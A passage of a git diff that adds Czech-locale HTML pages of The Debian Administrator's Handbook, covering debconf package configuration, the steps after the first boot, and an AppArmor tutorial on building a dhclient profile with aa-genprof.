+              class="literal">https://localhost:10000</code>. Beware! Not all the modules are directly usable. Sometimes they must be configured by specifying the locations of the corresponding configuration files and some executable files (program). Frequently the system will politely prompt you when it fails to activate a requested module.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> GNOME control center</strong></p></div></div></div><a
+              id="id-1.12.7.7.11.2"
+              class="indexterm"></a><div
+              class="para">
+				The GNOME project also provides multiple administration interfaces that are usually accessible via the “Settings” entry in the user menu on the top right. <code
+                class="command">gnome-control-center</code> is the main program that brings them all together but many of the system wide configuration tools are effectively provided by other packages (<span
+                class="pkg pkg">accountsservice</span>, <span
+                class="pkg pkg">system-config-printer</span>, etc.). Although they are easy to use, these applications cover only a limited number of base services: user management, time configuration, network configuration, printer configuration, and so on.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.debconf"></a>9.4.2. Configuring Packages: <code
+                    class="command">debconf</code></h3></div></div></div><a
+            id="id-1.12.7.8.2"
+            class="indexterm"></a><a
+            id="id-1.12.7.8.3"
+            class="indexterm"></a><div
+            class="para">
+				Many packages are automatically configured after asking a few questions during installation through the Debconf tool. These packages can be reconfigured by running <code
+              class="command">dpkg-reconfigure <em
+                class="replaceable">package</em></code>.
+			</div><div
+            class="para">
+				For most cases, these settings are very simple; only a few important variables in the configuration file are changed. These variables are often grouped between two “demarcation” lines so that reconfiguration of the package only impacts the enclosed area. In other cases, reconfiguration will not change anything if the script detects a manual modification of the configuration file, in order to preserve these human interventions (because the script can't ensure that its own modifications will not disrupt the existing settings).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DEBIAN POLICY</em></span> Preserving changes</strong></p></div></div></div><div
+              class="para">
+				The Debian Policy expressly stipulates that everything should be done to preserve manual changes made to a configuration file, so more and more scripts take precautions when editing configuration files. The general principle is simple: the script will only make changes if it knows the status of the configuration file, which is verified by comparing the checksum of the file against that of the last automatically generated file. If they are the same, the script is authorized to change the configuration file. Otherwise, it determines that the file has been changed and asks what action it should take (install the new file, save the old file, or try to integrate the new changes with the existing file). This precautionary principle has long been unique to Debian, but other distributions have gradually begun to embrace it.
+			</div><div
+              class="para">
+				The <code
+                class="command">ucf</code> program (from the Debian package of the same name) can be used to implement such a behavior.
+			</div><a
+              id="id-1.12.7.8.6.4"
+              class="indexterm"></a></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rights-management.html"><strong>Předcházející</strong>9.3. Managing Rights</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.syslog.html"><strong>Další</strong>9.5. syslog System Events</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.after-first-boot.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.after-first-boot.html
new file mode 100644
index 000000000..a32fab801
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.after-first-boot.html
@@ -0,0 +1,171 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">4.3. After the First Boot</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Installation, Partitioning, Formatting, File System, Boot Sector, Hardware Detection" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="installation.html"
+        title="Kapitola 4. Installation" /><link
+        rel="prev"
+        href="sect.installation-steps.html"
+        title="4.2. Installing, Step by Step" /><link
+        rel="next"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.after-first-boot.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.installation-steps.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="packaging-system.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.after-first-boot"></a>4.3. After the First Boot</h2></div></div></div><div
+          class="para">
+			If you activated the task “Debian desktop environment” without any explicit desktop choice (or with the “GNOME” choice), the computer will display the <code
+            class="command">gdm3</code> login manager.
+		</div><div
+          class="figure"><a
+            xmlns=""
+            id="id-1.7.13.3"></a><div
+            class="figure-contents"><div
+              class="mediaobject"><img
+                src="images/inst-gdm.png"
+                alt="First boot" /></div></div><p
+            class="title"><strong>Obrázek 4.14. First boot</strong></p></div><div
+          class="para">
+			The user that has already been created can then log in and begin working immediately.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.13.5"></a>4.3.1. Installing Additional Software</h3></div></div></div><div
+            class="para">
+				The installed packages correspond to the profiles selected during installation, but not necessarily to the use that will actually be made of the machine. As such, you might want to use a package management tool to refine the selection of installed packages. The two most frequently used tools (which are installed if the “Debian desktop environment” profile was chosen) are <code
+              class="command">apt</code> (accessible from the command line) and <code
+              class="command">synaptic</code> (“Synaptic Package Manager” in the menus).
+			</div><div
+            class="para">
+				To facilitate the installation of coherent groups of programs, Debian creates “tasks” that are dedicated to specific uses (mail server, file server, etc.). You already had the opportunity to select them during installation, and you can access them again thanks to package management tools such as <code
+              class="command">aptitude</code> (the tasks are listed in a distinct section) and <code
+              class="command">synaptic</code> (through the menu <span
+              class="guimenu"><strong>Edit</strong></span> → <span
+              class="guimenuitem"><strong>Mark Packages by Task…</strong></span>).
+			</div><div
+            class="para">
+				Aptitude is an interface to APT in full-screen text mode. It allows the user to browse the list of available packages according to various categories (installed or not-installed packages, by task, by section, etc.), and to view all of the information available on each of them (dependencies, conflicts, description, etc.). Each package can be marked “install” (to be installed, <span
+              class="keycap"><strong>+</strong></span> key) or “remove” (to be removed, <span
+              class="keycap"><strong>-</strong></span> key). All of these operations will be conducted simultaneously once you've confirmed them by pressing the <span
+              class="keycap"><strong>g</strong></span> key (“g” for “go!”). If you have forgotten some programs, no worries; you will be able to run <code
+              class="command">aptitude</code> again once the initial installation has been completed.
+			</div><a
+            id="id-1.7.13.5.5"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Debian thinks of speakers of non-English languages</strong></p></div></div></div><div
+              class="para">
+				Several tasks are dedicated to the localization of the system in other languages beyond English. They include translated documentation, dictionaries, and various other packages useful for speakers of different languages. The appropriate task is automatically selected if a non-English language was chosen during installation.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> <code
+                        class="command">dselect</code>, the old interface to install packages</strong></p></div></div></div><div
+              class="para">
+				Before <code
+                class="command">aptitude</code>, the standard program to select packages to be installed was <code
+                class="command">dselect</code>, the old graphical interface associated with <code
+                class="command">dpkg</code>. Being a difficult program for beginners to use, it is not recommended.
+			</div><a
+              id="id-1.7.13.5.7.3"
+              class="indexterm"></a></div><div
+            class="para">
+				Of course, it is possible not to select any task to be installed. In this case, you can manually install the desired software with the <code
+              class="command">apt</code> or <code
+              class="command">aptitude</code> command (which are both accessible from the command line).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Package dependencies, conflicts</strong></p></div></div></div><div
+              class="para">
+				In the Debian packaging lingo, a “dependency” is another package necessary for the proper functioning of the package in question. Conversely, a “conflict” is a package that can not be installed side-by-side with another.
+			</div><div
+              class="para">
+				These concepts are discussed in greater detail in <a
+                class="xref"
+                href="packaging-system.html">5 – „<em>Packaging System: Tools and Fundamental Principles</em>“</a>.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.13.6"></a>4.3.2. Upgrading the System</h3></div></div></div><a
+            id="id-1.7.13.6.2"
+            class="indexterm"></a><div
+            class="para">
+				A first <code
+              class="command">apt upgrade</code> (a command used to automatically update installed programs) is generally required, especially for possible security updates issued since the release of the latest Debian stable version. These updates may involve some additional questions through <code
+              class="command">debconf</code>, the standard Debian configuration tool. For further information on these updates conducted by <code
+              class="command">apt</code>, please refer to <a
+              class="xref"
+              href="sect.apt-get.html#sect.apt-upgrade">6.2.3 – „System Upgrade“</a>.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.installation-steps.html"><strong>Předcházející</strong>4.2. Installing, Step by Step</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="packaging-system.html"><strong>Další</strong>Kapitola 5. Packaging System: Tools and Fundament...</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apparmor.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apparmor.html
new file mode 100644
index 000000000..b3ea36a71
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.apparmor.html
@@ -0,0 +1,520 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.4. Introduction to AppArmor</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="sect.supervision.html"
+        title="14.3. Supervision: Prevention, Detection, Deterrence" /><link
+        rel="next"
+        href="sect.selinux.html"
+        title="14.5. Introduction to SELinux" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.apparmor.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.supervision.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.selinux.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.apparmor"></a>14.4. Introduction to AppArmor</h2></div></div></div><a
+          id="id-1.17.7.2"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apparmor-principles"></a>14.4.1. Principles</h3></div></div></div><div
+            class="para">
+				AppArmor is a <span
+              class="emphasis"><em>Mandatory Access Control</em></span> (MAC) system built on Linux's LSM (<span
+              class="emphasis"><em>Linux Security Modules</em></span>) interface. In practice, the kernel queries AppArmor before each system call to know whether the process is authorized to do the given operation. Through this mechanism, AppArmor confines programs to a limited set of resources.
+			</div><a
+            id="id-1.17.7.3.3"
+            class="indexterm"></a><a
+            id="id-1.17.7.3.4"
+            class="indexterm"></a><div
+            class="para">
+				AppArmor applies a set of rules (known as “profile”) on each program. The profile applied by the kernel depends on the installation path of the program being executed. Contrary to SELinux (discussed in <a
+              class="xref"
+              href="sect.selinux.html">14.5 – „Introduction to SELinux“</a>), the rules applied do not depend on the user. All users face the same set of rules when they are executing the same program (but traditional user permissions still apply and might result in different behaviour!).
+			</div><div
+            class="para">
+				AppArmor profiles are stored in <code
+              class="filename">/etc/apparmor.d/</code> and they contain a list of access control rules on resources that each program can make use of. The profiles are compiled and loaded into the kernel by the <code
+              class="command">apparmor_parser</code> command. Each profile can be loaded either in enforcing or complaining mode. The former enforces the policy and reports violation attempts, while the latter does not enforce the policy but still logs the system calls that would have been denied.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apparmor-setup"></a>14.4.2. Enabling AppArmor and managing AppArmor profiles</h3></div></div></div><div
+            class="para">
+				AppArmor support is built into the standard kernels provided by Debian. Enabling AppArmor is thus just a matter of installing a few packages and adding some parameters to the kernel command line:
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>apt install apparmor apparmor-profiles apparmor-utils
+</code></strong><code
+              class="computeroutput">[...]
+# </code><strong
+              class="userinput"><code>perl -pi -e 's,GRUB_CMDLINE_LINUX="(.*)"$,GRUB_CMDLINE_LINUX="$1 apparmor=1 security=apparmor",' /etc/default/grub
+</code></strong><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>update-grub
+</code></strong></pre><div
+            class="para">
+				After a reboot, AppArmor is now functional and <code
+              class="command">aa-status</code> will confirm it quickly:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>aa-status</code></strong>
+<code
+              class="computeroutput">apparmor module is loaded.
+44 profiles are loaded.
+9 profiles are in enforce mode.
+   /usr/bin/lxc-start
+   /usr/lib/chromium-browser/chromium-browser//browser_java
+[...]
+35 profiles are in complain mode.
+   /sbin/klogd
+[...]
+3 processes have profiles defined.
+1 processes are in enforce mode.
+   /usr/sbin/libvirtd (1295) 
+2 processes are in complain mode.
+   /usr/sbin/avahi-daemon (941) 
+   /usr/sbin/avahi-daemon (1000) 
+0 processes are unconfined but have a profile defined.</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> More AppArmor profiles</strong></p></div></div></div><div
+              class="para">
+				The <span
+                class="pkg pkg">apparmor-profiles</span> package contains profiles managed by the upstream AppArmor community. To get even more profiles you can install <span
+                class="pkg pkg">apparmor-profiles-extra</span> which contains profiles developed by Ubuntu and Debian.
+			</div></div><div
+            class="para">
+				The state of each profile can be switched between enforcing and complaining with calls to <code
+              class="command">aa-enforce</code> and <code
+              class="command">aa-complain</code> giving as parameter either the path of the executable or the path to the policy file. Additionaly a profile can be entirely disabled with <code
+              class="command">aa-disable</code> or put in audit mode (to log accepted system calls too) with <code
+              class="command">aa-audit</code>.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>aa-enforce /usr/sbin/avahi-daemon</code></strong>
+<code
+              class="computeroutput">Setting /usr/sbin/avahi-daemon to enforce mode.</code>
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>aa-complain /etc/apparmor.d/usr.bin.lxc-start</code></strong>
+<code
+              class="computeroutput">Setting /etc/apparmor.d/usr.bin.lxc-start to complain mode.</code>
+</pre></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apparmor-new-profile"></a>14.4.3. Creating a new profile</h3></div></div></div><div
+            class="para">
+				Even though creating an AppArmor profile is rather easy, most programs do not have one. This section will show you how to create a new profile from scratch just by using the target program and letting AppArmor monitor the system call it makes and the resources it accesses.
+			</div><div
+            class="para">
+				The most important programs that need to be confined are the network facing programs as those are the most likely targets of remote attackers. That is why AppArmor conveniently provides an <code
+              class="command">aa-unconfined</code> command to list the programs which have no associated profile and which expose an open network socket. With the <code
+              class="literal">--paranoid</code> option you get all unconfined processes that have at least one active network connection.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>aa-unconfined</code></strong>
+<code
+              class="computeroutput">801 /sbin/dhclient not confined
+890 /sbin/rpcbind not confined
+899 /sbin/rpc.statd not confined
+929 /usr/sbin/sshd not confined
+941 /usr/sbin/avahi-daemon confined by '/usr/sbin/avahi-daemon (complain)'
+988 /usr/sbin/minissdpd not confined
+1276 /usr/sbin/exim4 not confined
+1485 /usr/lib/erlang/erts-6.2/bin/epmd not confined
+1751 /usr/lib/erlang/erts-6.2/bin/beam.smp not confined
+19592 /usr/lib/dleyna-renderer/dleyna-renderer-service not confined</code>
+</pre><div
+            class="para">
+				In the following example, we will thus try to create a profile for <code
+              class="command">/sbin/dhclient</code>. For this we will use <code
+              class="command">aa-genprof dhclient</code>. It will invite you to use the application in another window and when done to come back to <code
+              class="command">aa-genprof</code> to scan for AppArmor events in the system logs and convert those logs into access rules. For each logged event, it will make one or more rule suggestions that you can either approve or further edit in multiple ways:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>aa-genprof dhclient</code></strong>
+<code
+              class="computeroutput">Writing updated profile for /sbin/dhclient.
+Setting /sbin/dhclient to complain mode.
+
+Before you begin, you may wish to check if a
+profile already exists for the application you
+wish to confine. See the following wiki page for
+more information:
+http://wiki.apparmor.net/index.php/Profiles
+
+Please start the application to be profiled in
+another window and exercise its functionality now.
+
+Once completed, select the "Scan" option below in 
+order to scan the system logs for AppArmor events. 
+
+For each AppArmor event, you will be given the 
+opportunity to choose whether the access should be 
+allowed or denied.
+
+Profiling: /sbin/dhclient
+
+[(S)can system log for AppArmor events] / (F)inish
+Reading log entries from /var/log/audit/audit.log.
+
+Profile:  /sbin/dhclient <span
+                id="aa-genprof-execute"><img
+                  class="callout"
+                  src="Common_Content/images/1.png"
+                  alt="1" /></span>
+Execute:  /usr/lib/NetworkManager/nm-dhcp-helper
+Severity: unknown
+
+(I)nherit / (C)hild / (P)rofile / (N)amed / (U)nconfined / (X) ix On / (D)eny / Abo(r)t / (F)inish
+<strong
+                class="userinput"><code>P</code></strong>
+Should AppArmor sanitise the environment when
+switching profiles?
+
+Sanitising environment is more secure,
+but some applications depend on the presence
+of LD_PRELOAD or LD_LIBRARY_PATH.
+
+(Y)es / [(N)o]
+<strong
+                class="userinput"><code>Y</code></strong>
+Writing updated profile for /usr/lib/NetworkManager/nm-dhcp-helper.
+Complain-mode changes:
+WARN: unknown capability: CAP_net_raw
+
+Profile:    /sbin/dhclient <span
+                id="aa-genprof-capability"><img
+                  class="callout"
+                  src="Common_Content/images/2.png"
+                  alt="2" /></span>
+Capability: net_raw
+Severity:   unknown
+
+[(A)llow] / (D)eny / (I)gnore / Audi(t) / Abo(r)t / (F)inish
+<strong
+                class="userinput"><code>A</code></strong>
+Adding capability net_raw to profile.
+
+Profile:  /sbin/dhclient <span
+                id="aa-genprof-read"><img
+                  class="callout"
+                  src="Common_Content/images/3.png"
+                  alt="3" /></span>
+Path:     /etc/nsswitch.conf
+Mode:     r
+Severity: unknown
+
+  1 - #include &lt;abstractions/apache2-common&gt; 
+  2 - #include &lt;abstractions/libvirt-qemu&gt; 
+  3 - #include &lt;abstractions/nameservice&gt; 
+  4 - #include &lt;abstractions/totem&gt; 
+ [5 - /etc/nsswitch.conf]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>3</code></strong>
+
+Profile:  /sbin/dhclient
+Path:     /etc/nsswitch.conf
+Mode:     r
+Severity: unknown
+
+  1 - #include &lt;abstractions/apache2-common&gt; 
+  2 - #include &lt;abstractions/libvirt-qemu&gt; 
+ [3 - #include &lt;abstractions/nameservice&gt;]
+  4 - #include &lt;abstractions/totem&gt; 
+  5 - /etc/nsswitch.conf 
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>A</code></strong>
+Adding #include &lt;abstractions/nameservice&gt; to profile.
+
+Profile:  /sbin/dhclient
+Path:     /proc/7252/net/dev
+Mode:     r
+Severity: 6
+
+  1 - /proc/7252/net/dev 
+ [2 - /proc/*/net/dev]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>A</code></strong>
+Adding /proc/*/net/dev r to profile
+
+[...]
+Profile:  /sbin/dhclient <span
+                id="aa-genprof-write"><img
+                  class="callout"
+                  src="Common_Content/images/4.png"
+                  alt="4" /></span>
+Path:     /run/dhclient-eth0.pid
+Mode:     w
+Severity: unknown
+
+ [1 - /run/dhclient-eth0.pid]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>N</code></strong>
+
+Enter new path: /run/dhclient*.pid
+
+Profile:  /sbin/dhclient
+Path:     /run/dhclient-eth0.pid
+Mode:     w
+Severity: unknown
+
+  1 - /run/dhclient-eth0.pid 
+ [2 - /run/dhclient*.pid]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>A</code></strong>
+Adding /run/dhclient*.pid w to profile
+
+[...]
+Profile:  /usr/lib/NetworkManager/nm-dhcp-helper <span
+                id="aa-genprof-other-profile"><img
+                  class="callout"
+                  src="Common_Content/images/5.png"
+                  alt="5" /></span>
+Path:     /proc/filesystems
+Mode:     r
+Severity: 6
+
+ [1 - /proc/filesystems]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>A</code></strong>
+Adding /proc/filesystems r to profile
+
+= Changed Local Profiles =
+
+The following local profiles were changed. Would you like to save them?
+
+ [1 - /sbin/dhclient]
+  2 - /usr/lib/NetworkManager/nm-dhcp-helper 
+(S)ave Changes / Save Selec(t)ed Profile / [(V)iew Changes] / View Changes b/w (C)lean profiles / Abo(r)t
+<strong
+                class="userinput"><code>S</code></strong>
+Writing updated profile for /sbin/dhclient.
+Writing updated profile for /usr/lib/NetworkManager/nm-dhcp-helper.
+
+Profiling: /sbin/dhclient
+
+[(S)can system log for AppArmor events] / (F)inish
+<strong
+                class="userinput"><code>F</code></strong>
+Setting /sbin/dhclient to enforce mode.
+Setting /usr/lib/NetworkManager/nm-dhcp-helper to enforce mode.
+
+Reloaded AppArmor profiles in enforce mode.
+
+Please consider contributing your new profile!
+See the following wiki page for more information:
+http://wiki.apparmor.net/index.php/Profiles
+
+Finished generating profile for /sbin/dhclient.</code></pre><div
+            class="para">
+				Note that the program does not display back the control characters that you type but for the clarity of the explanation I have included them in the previous transcript.
+			</div><div
+            class="calloutlist"><table
+              border="0"
+              summary="Callout list"><tr><td
+                  width="5%"
+                  valign="top"
+                  align="left"><p><a
+                      href="#aa-genprof-execute"><img
+                        class="callout"
+                        src="Common_Content/images/1.png"
+                        alt="1" /></a> </p></td><td
+                  valign="top"
+                  align="left"><div
+                    class="para">
+						The first event detected is the execution of another program. In that case, you have multiple choices: you can run the program with the profile of the parent process (the “Inherit” choice), you can run it with its own dedicated profile (the “Profile” and the “Named” choices, differing only by the possibility to use an arbitrary profile name), you can run it with a sub-profile of the parent process (the “Child” choice), you can run it without any profile (the “Unconfined” choice) or you can decide to not run it at all (the “Deny” choice).
+					</div><div
+                    class="para">
+						Note that when you opt to run it under a dedicated profile that doesn't exist yet, the tool will create the missing profile for you and will make rule suggestions for that profile in the same run.
+					</div></td></tr><tr><td
+                  width="5%"
+                  valign="top"
+                  align="left"><p><a
+                      href="#aa-genprof-capability"><img
+                        class="callout"
+                        src="Common_Content/images/2.png"
+                        alt="2" /></a> </p></td><td
+                  valign="top"
+                  align="left"><div
+                    class="para">
+						At the kernel level, the special powers of the root user have been split in “capabilities”. When a system call requires a specific capability, AppArmor will verify whether the profile allows the program to make use of this capability.
+					</div></td></tr><tr><td
+                  width="5%"
+                  valign="top"
+                  align="left"><p><a
+                      href="#aa-genprof-read"><img
+                        class="callout"
+                        src="Common_Content/images/3.png"
+                        alt="3" /></a> </p></td><td
+                  valign="top"
+                  align="left"><div
+                    class="para">
+						Here the program seeks read permissions for <code
+                      class="filename">/etc/nsswitch.conf</code>. <code
+                      class="command">aa-genprof</code> detected that this permission was also granted by multiple “abstractions” and offers them as alternative choices. An abstraction provides a reusable set of access rules grouping together multiple resources that are commonly used together. In this specific case, the file is generally accessed through the nameservice related functions of the C library and we type “3” to first select the “#include &lt;abstractions/nameservice&gt;” choice and then “A” to allow it.
+					</div></td></tr><tr><td
+                  width="5%"
+                  valign="top"
+                  align="left"><p><a
+                      href="#aa-genprof-write"><img
+                        class="callout"
+                        src="Common_Content/images/4.png"
+                        alt="4" /></a> </p></td><td
+                  valign="top"
+                  align="left"><div
+                    class="para">
+						The program wants to create the <code
+                      class="filename">/run/dhclient-eth0.pid</code> file. If we allow the creation of this specific file only, the program will not work when the user will use it on another network interface. Thus we select “New” to replace the filename with the more generic “/run/dhclient*.pid” before recording the rule with “Allow”.
+					</div></td></tr><tr><td
+                  width="5%"
+                  valign="top"
+                  align="left"><p><a
+                      href="#aa-genprof-other-profile"><img
+                        class="callout"
+                        src="Common_Content/images/5.png"
+                        alt="5" /></a> </p></td><td
+                  valign="top"
+                  align="left"><div
+                    class="para">
+						Notice that this access request is not part of the dhclient profile but of the new profile that we created when we allowed <code
+                      class="filename">/usr/lib/NetworkManager/nm-dhcp-helper</code> to run with its own profile.
+					</div><div
+                    class="para">
+						After having gone through all the logged events, the program offers to save all the profiles that were created during the run. In this case, we have two profiles that we save at once with “Save” (but you can save them individually too) before leaving the program with “Finish”.
+					</div></td></tr></table></div><div
+            class="para">
+				<code
+              class="command">aa-genprof</code> is in fact only a smart wrapper around <code
+              class="command">aa-logprof</code>: it creates an empty profile, loads it in complain mode and then run <code
+              class="command">aa-logprof</code> which is a tool to update a profile based on the profile violations that have been logged. So you can re-run that tool later to improve the profile that you just created.
+			</div><div
+            class="para">
+				If you want the generated profile to be complete, you should use the program in all the ways that it is legitimately used. In the case of dhclient, it means running it via Network Manager, running it via ifupdown, running it manually, etc. In the end, you might get a <code
+              class="filename">/etc/apparmor.d/sbin.dhclient</code> close to this:
+			</div><pre
+            class="programlisting">
+# Last Modified: Tue Sep  8 21:40:02 2015
+#include &lt;tunables/global&gt;
+
+/sbin/dhclient {
+  #include &lt;abstractions/base&gt;
+  #include &lt;abstractions/nameservice&gt;
+
+  capability net_bind_service,
+  capability net_raw,
+
+  /bin/dash r,
+  /etc/dhcp/* r,
+  /etc/dhcp/dhclient-enter-hooks.d/* r,
+  /etc/dhcp/dhclient-exit-hooks.d/* r,
+  /etc/resolv.conf.* w,
+  /etc/samba/dhcp.conf.* w,
+  /proc/*/net/dev r,
+  /proc/filesystems r,
+  /run/dhclient*.pid w,
+  /sbin/dhclient mr,
+  /sbin/dhclient-script rCx,
+  /usr/lib/NetworkManager/nm-dhcp-helper Px,
+  /var/lib/NetworkManager/* r,
+  /var/lib/NetworkManager/*.lease rw,
+  /var/lib/dhcp/*.leases rw,
+
+  profile /sbin/dhclient-script flags=(complain) {
+    #include &lt;abstractions/base&gt;
+    #include &lt;abstractions/bash&gt;
+
+    /bin/dash rix,
+    /etc/dhcp/dhclient-enter-hooks.d/* r,
+    /etc/dhcp/dhclient-exit-hooks.d/* r,
+    /sbin/dhclient-script r,
+
+  }
+}
+</pre></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.supervision.html"><strong>Předcházející</strong>14.3. Supervision: Prevention, Detection, Deterre...</a></li><li
+          class="up"><a
+            accesskey="u"
